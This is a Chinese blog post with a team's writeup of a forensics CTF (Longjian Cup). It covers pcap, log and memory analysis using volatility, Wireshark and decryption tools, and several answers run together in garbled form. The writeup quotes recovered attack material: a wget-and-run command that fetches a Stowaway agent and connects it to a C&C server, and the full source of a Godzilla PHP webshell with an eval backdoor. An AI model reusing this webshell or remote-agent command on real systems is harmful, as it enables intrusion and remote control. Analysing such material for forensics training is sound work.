现在只对常读和星标的公众号才展示大图推送,建议大家把潇湘信安“设为星标”,否则可能看不到了!
这篇文章由群里@骑虎牧羊师傅原创投稿,记录的是他们参加第一届陇剑杯-线上赛复盘-writeup,感谢分享!
战队
战队名称:翻身不成反糊底战队排名:129
签到
1. 此时正在进行的可能是__________协议的网络攻击。(如有字母请全部使用小写,填写样例:http、dns、ftp)
在数据包中有许多http的错误请求。可以猜测攻击者使用http进行攻击,但是在tcp传输过程中爆出了更多错,应该一次ddos攻击。
一、JWT
1. 该网站使用了____认证方式(如有字母请全部是用小写)
根据题目JWT,然后提示有字母,直接尝试提交jwt成功
2. 黑客绕过验证使用的jwt中,id和username是______。(中间使用#号隔开,例如1#admin)
打开流量包goroot.pcap,追踪http流
根据题目要求获取id和username,直接全局搜索username获取到登录请求,返回包中会存在jwt认证token
访问https://jwt.io/#debugger-io,对token进行解密得到答案。
3. 黑客获取webshell之后,权限是______?
翻找流量包发现命令执行请求目录为/exec,重点观察exec返回包,发现root
4. 黑客上传的恶意文件文件名是_____________。(请提交带有文件后缀的文件名,例如x.txt)
查看到文件写入/tmp/1.c
5. 黑客在服务器上编译的恶意so文件,文件名是_____________。(请提交带有文件后缀的文件名,例如x.so)
Looter.so文件的复制过程
6. 黑客在服务器上修改了一个配置文件,文件的绝对路径为_____________。(请确认绝对路径后再提交)
攻击者修改了/etc/pam.d/common-auth文件
二、WebShell
1. 黑客登录系统使用的密码是_____________。
直接找post请求的login接口,test:Admin123!@#
2. 黑客修改了一个日志文件,文件的绝对路径为_____________。(请确认绝对路径后再提交)
这里黑客使用模板注入,过滤post和响应成功的包,可以的到用户篡改的文件为
Form item: "tpl" = "data/Runtime/Logs/Home/21_08_07.log"Thinkphp模板注入
3. 黑客获取webshell之后,权限是______?
www-data4. 黑客写入的webshell文件名是_____________。(请提交带有文件后缀的文件名,例如x.txt)
1.php5. 黑客上传的代理工具客户端名字是_____________。(如有字母请全部使用小写)
Frpc6. 黑客代理工具的回连服务端IP是_____________。
在发现frpc.ini的上一个包里发现传输,应该是菜刀流量
对密码xa5d606e67883a进行hex解码
7. 黑客的socks5的连接账号、密码是______。(中间使用#号隔开,例如admin#passwd)
同上
三、日志分析
1. 网络存在源码泄漏,源码文件名是_____________。(请提交带有文件后缀的文件名,例如x.txt)
筛选日志中的200响应包,发现www.zip
2. 分析攻击流量,黑客往/tmp目录写入一个文件,文件名为_____________。
筛选日志中的200响应包,发现/tmp/sess_car
3. 分析攻击流量,黑客使用的是______类读取了秘密文件。
析写入文件的内容此处时python反序列化的串可以得到查看文件的对象为SplFileObject
四、内存分析
工具:volatility
https://github.com/volatilityfoundation/volatilityhttps://github.com/volatilityfoundation/volatility3
查看内存镜像信息
volatility -f Target1.vmem imageinfo使用hashdump命令获取用户名
volatility -f Target1.vmem --profile=Win7SP1x64 hashdumpsadump命令获取最后登录的用户
查看内存中文件
volatility -f wuliao.data --profile=Win7SP1x64 filescan |grep "xxx"导出exe文件
volatility -f Target1.vmem --profile=Win7SP1x64 dumpfiles -Q 0x000000007d8c7d10 -D ./ -u解压dat后缀文件获得文件夹
打开后发现是加密后的图片文件,huawei加密备份
使用解密工具
https://github.com/RealityNet/kobackupdec工具一把梭,解密的密码按照前面txt提示把flag内容空格换成下划线,后面写文件夹的路径,再后面写导出文件的路径,导出文件的路径要写一个新的backup,工具会自动创建新的backup目录 将文件放进里面
python3 kobackupdec.py -vvv W31C0M3_T0_THiS_34SY_F0R3NSiCX "/root/Desktop/HUAWEI P40_2021-aa-bb xx.yy.zz" "/root/Desktop/test1"获取到images0.tar文件
解压文件获取到图片
Pictures/flag/mmexport1630152510463.png
1. 虚拟机的密码是_____________。
(密码中为flag{xxxx},含有空格,提交时不要去掉)
2. 虚拟机中有一个某品牌手机的备份文件,文件里的图片里的字符串为_____________。
Tips: no space but underline五、简单日志分析
1. 黑客攻击的参数是______。(如有字母请全部使用小写)
2. 黑客查看的秘密文件的绝对路径是_____________。
解密参数
3. 黑客反弹shell的ip和端口是_____________。(格式使用“ip:端口",例如127.0.0.1:2333)
解码发现bash -i后面为乱码,然后注意到了中间的%2b
将后半部分取出,urldecode后就清楚起来
去掉加号,将后半部分进行base解码
六、SQL注入
1. 黑客在注入过程中采用的注入手法叫_____________。(格式为4个汉字,例如“拼搏努力”)
布尔盲注
2. 黑客在注入过程中,最终获取flag的数据库名、表名和字段名是_____________。
格式为“数据库名#表名#字段名”,例如database#table#column
flag#flag3. 黑客最后获取到的flag字符串为_____________。
这里提取出payload中由select%20flag%20from%20sqli.flag)并寻找关键字 %C2%80 可以得到flag
遍历处flag为
flag%7Bdeddcd67-bcfd-487e-b940-1217e668c7db%7D七、IOS
追踪tcp流
黑客在用户手机执行了命令,发送命令的手机主机为3.128.156.159
wget https://github.com/ph4ntonn/Stowaway/releases/download/1.6.2/ios_agent && chmod 755 ios_agent./ios_agent -c 3.128.156.159:8081 -s hack4sec
1. 黑客所控制的C&C服务器IP是_____________。
3.128.156.159
2. 黑客利用的Github开源项目的名字是______。(如有字母请全部使用小写)
wget https://github.com/ph4ntonn/Stowaway/releases/download/1.6.2/ios_agent && chmod 755 ios_agent3. 通讯加密密钥的明文是____________。
./ios_agent -c 3.128.156.159:8081 -s hack4sec4. 黑客通过SQL盲注拿到了一个敏感数据,内容是____________。
检测以192.168.1.8到192.168.1.12的流量,通过key.log进行解密
ip.addr == 192.168.1.12 and http2746558f-c84-456-85d-d6c0f2edabb2ZZZj5. 黑客端口扫描的扫描器的扫描范围是____________。(格式使用“开始端口-结束端口”,例如1-65535)
此时已经知道黑客代理在192.168.1.8上,过滤ip.src_host==192.168.1.8,观察发包的源地址和目的地址
10-4996. 被害者手机上被拿走了的私钥文件内容是____________。
7. 黑客访问/攻击了内网的几个服务器,IP地址为____________。(多个IP之间按从小到大排序,使用#来分隔,例如127.0.0.1#192.168.0.1)
流量包中是192.168.1.12
Access.log中是172.28.0.3
8. 黑客写入了一个webshell,其密码为____________。
日志记录中记录为fxxk
八、(未作出)流量分析
1. 攻击者的IP是_____________。
172.18.0.1
2. 攻击者所使用的会话密钥是_____________。
DtX0GScM9dwrgZht
3. 攻击者所控制的C&C服务器IP是_____________。
147.182.251.98
九、WIFI
1. 小王往upload-labs上传木马后进行了cat /flag,flag内容为_____________。
(压缩包里有解压密码的提示,需要额外添加花括号)
1.1 关注服务器.pcap
发现包序27之前基本都是加密流量,但在包序27的地方上传了马。
追踪木马写入操作,进行解密
通过CyberChef解密内容,结果为一段木马内容
加入分析备注,为哥斯拉木马
@session_start();//创建会话@set_time_limit(0);//防超时@error_reporting(0);//关闭报错页function encode($D,$K){for($i=0;$i<strlen($D);$i++) {$c = $K[$i+1&15];$D[$i] = $D[$i]^$c;}return $D;}//加密算法,对$D进行加密$pass='key';$payloadName='payload';$key='3c6e0b8a9c15224a';//这里是简化了马子,本来是三个参数再进行下面的运算if (isset($_POST[$pass])){$data=encode(base64_decode($_POST[$pass]),$key);//base64加密if (isset($_SESSION[$payloadName])){$payload=encode($_SESSION[$payloadName],$key);eval($payload);//session中的eval函数记录payload,这里是哥斯拉的强特征echo substr(md5($pass.$key),0,16);echo base64_encode(encode(@run($data),$key));echo substr(md5($pass.$key),16);//前后16位是md5,中间是base64加密}else{if (stripos($data,"getBasicsInfo")!==false){$_SESSION[$payloadName]=encode($data,$key);}//将payload存入session中}}
1.2 关注客户端.pcap
发现相关信息SSID=My_Wifi、HuaweiDe_4c:55:ec
1.3 处理Windows 7-dde00fa9.vmem
Imageinfo查看信息
Cmdscan查看历史命令,发现export导出相关文件
Filescan查看文件
volatility -f Windows\ 7-dde00fa9.vmem --profile=Win7SP1x86_23418 filescan | grep zipDumpfiles导出文件
volatility -f Windows\ 7-dde00fa9.vmem --profile=Win7SP1x86_23418 dumpfiles -Q 0x000000003fdc38c8 -D ./导出后发现是dat文件,打开发现需要密码
根据提示,查看压缩文件备注。提示说明密码为网卡的GUID
通过文件扫描命令查询
volatility -f Windows\ 7-dde00fa9.vmem --profile=Win7SP1x86_23418 filescan | grep {或是知道网卡GUID和接口绑定执行
volatility -f Windows\ 7-dde00fa9.vmem --profile=Win7SP1x86_23418 filescan | grep "Interfaces"解密压缩包, 是xml文件,看看里面有啥东西吧。
1.4 解密客户端.pacp
通过airdecap-ng解密WPA/WPA2捕获流量包
查看解密后客户端流量包,发现访问页面
追踪到包序1077的response包,为上传页面
包序1115上传1.php的response包
1.5 解密服务器.pcap中的key
fL1tMGI4YTljMX78f8Wo/yhTB1UCWKkQNeHS+H8ZqPssxy78L12DP+mUY5YUD4bUhRCDlWI47KXNfh4yMjQ=72a9c691ccdaab98fL1tMGI4YTljMn75e3jOBS5/V31Qd1NxKQMCe3h4KwFQfVAEVworCi0FfgB+BlWZhjRlQuTIIB5jMTU=b4c4e1f6ddd2a488太长了不便阅读,第一篇就到这吧,明天再发第二篇!!!
关注我们
还在等什么?赶紧点击下方名片开始学习吧
知 识 星 球
推 荐 阅 读
